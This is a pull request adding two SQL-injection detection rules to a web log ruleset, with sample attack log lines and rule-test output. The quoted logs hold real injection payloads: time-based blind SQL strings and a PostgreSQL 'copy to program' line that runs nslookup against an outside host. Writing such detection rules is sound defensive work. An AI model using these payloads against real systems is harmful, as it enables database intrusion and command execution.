### PR TITLE
add new rule sql-injection

### DIFF
--- a/rules/0245-web_rules.xml
+++ b/rules/0245-web_rules.xml
@@ -249,5 +249,18 @@
         <group>attack,pci_dss_11.4,</group>
     </rule>
 
+  <rule id="31168" level="6">
+    <if_sid>31100</if_sid>
+    <url>%2csleep|sysdate()|nslookup%20dns.sqli</url>
+    <description>SQL injection attempt.</description>
+    <group>attack,sqlinjection,pci_dss_6.5,pci_dss_11.4,pci_dss_6.5.1,gdpr_IV_35.7.d,</group>
+  </rule>
+
+  <rule id="31169" level="6">
+    <if_sid>31100</if_sid>
+    <url>select%20|insert%20</url>
+    <description>SQL injection attempt.</description>
+    <group>attack,sqlinjection,pci_dss_6.5,pci_dss_11.4,pci_dss_6.5.1,gdpr_IV_35.7.d,</group>
+  </rule>
 
 </group>


### PR DESCRIPTION
I add two new rules which mach with logs appear in  this [issue](https://github.com/wazuh/wazuh-ruleset/issues/342). These logs are as follows:

>www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:12 +0000] "GET /example?dir=asc&order=Mcd6Pr9F';select%20pg_sleep(9.703);%20--%20&example=5101 HTTP/1.1" 200 10345 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFSOin2ac7y0KragEaGwAAAAM"

>www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:09 +0000] "GET /example?dir=asc&order=if(now()=sysdate()%2csleep(19.406)%2c0)/*'XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR'\"XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR\"*/&example=5101 HTTP/1.1" 200 10869 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFRRmu6BzGhDFQJ1K@HwAAAAs"

>www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:08:43 +0000] "GET /example/result/?frame=15&price=2000-999999&q=1;copy%20(select%20'')%20to%20program%20'nslookup%20dns.sqli.%5c027837.40-4956.40.fd71c.%5c1.bxss.me' HTTP/1.1" 302 6607 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFK3HSTP7l6freHq0-NgAAAAc"

And the output with new rules is:
```
www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:12 +0000] "GET /example?dir=asc&order=Mcd6Pr9F';select%20pg_sleep(9.703);%20--%20&example=5101 HTTP/1.1" 200 10345 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFSOin2ac7y0KragEaGwAAAAM"


**Phase 1: Completed pre-decoding.
       full event: 'www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:12 +0000] "GET /example?dir=asc&order=Mcd6Pr9F';select%20pg_sleep(9.703);%20--%20&example=5101 HTTP/1.1" 200 10345 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFSOin2ac7y0KragEaGwAAAAM"'
       timestamp: '(null)'
       hostname: 'lopezziur-S551LN'
       program_name: '(null)'
       log: 'www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:12 +0000] "GET /example?dir=asc&order=Mcd6Pr9F';select%20pg_sleep(9.703);%20--%20&example=5101 HTTP/1.1" 200 10345 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFSOin2ac7y0KragEaGwAAAAM"'

**Phase 2: Completed decoding.
       decoder: 'web-accesslog'
       srcip: '1.1.1.1'
       protocol: 'GET'
       url: '/example?dir=asc&order=Mcd6Pr9F';select%20pg_sleep(9.703);%20--%20&example=5101'
       id: '200'

**Phase 3: Completed filtering (rules).
       Rule id: '31169'
       Level: '6'
       Description: 'SQL injection attempt.'
**Alert to be generated.

www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:09 +0000] "GET /example?dir=asc&order=if(now()=sysdate()%2csleep(19.406)%2c0)/*'XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR'\"XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR\"*/&example=5101 HTTP/1.1" 200 10869 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFRRmu6BzGhDFQJ1K@HwAAAAs"


**Phase 1: Completed pre-decoding.
       full event: 'www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:09 +0000] "GET /example?dir=asc&order=if(now()=sysdate()%2csleep(19.406)%2c0)/*'XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR'\"XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR\"*/&example=5101 HTTP/1.1" 200 10869 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFRRmu6BzGhDFQJ1K@HwAAAAs"'
       timestamp: '(null)'
       hostname: 'lopezziur-S551LN'
       program_name: '(null)'
       log: 'www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:09 +0000] "GET /example?dir=asc&order=if(now()=sysdate()%2csleep(19.406)%2c0)/*'XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR'\"XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR\"*/&example=5101 HTTP/1.1" 200 10869 "https://www.example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" "-" "XIeFRRmu6BzGhDFQJ1K@HwAAAAs"'

**Phase 2: Completed decoding.
       decoder: 'web-accesslog'
       srcip: '1.1.1.1'
       protocol: 'GET'
       url: '/example?dir=asc&order=if(now()=sysdate()%2csleep(19.406)%2c0)/*'XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR'\"XOR(if(now()=sysdate()%2csleep(19.406)%2c0))OR\"*/&example=5101'
       id: '200'

**Phase 3: Completed filtering (rules).
       Rule id: '31168'
       Level: '6'
       Description: 'SQL injection attempt.'
**Alert to be generated.
```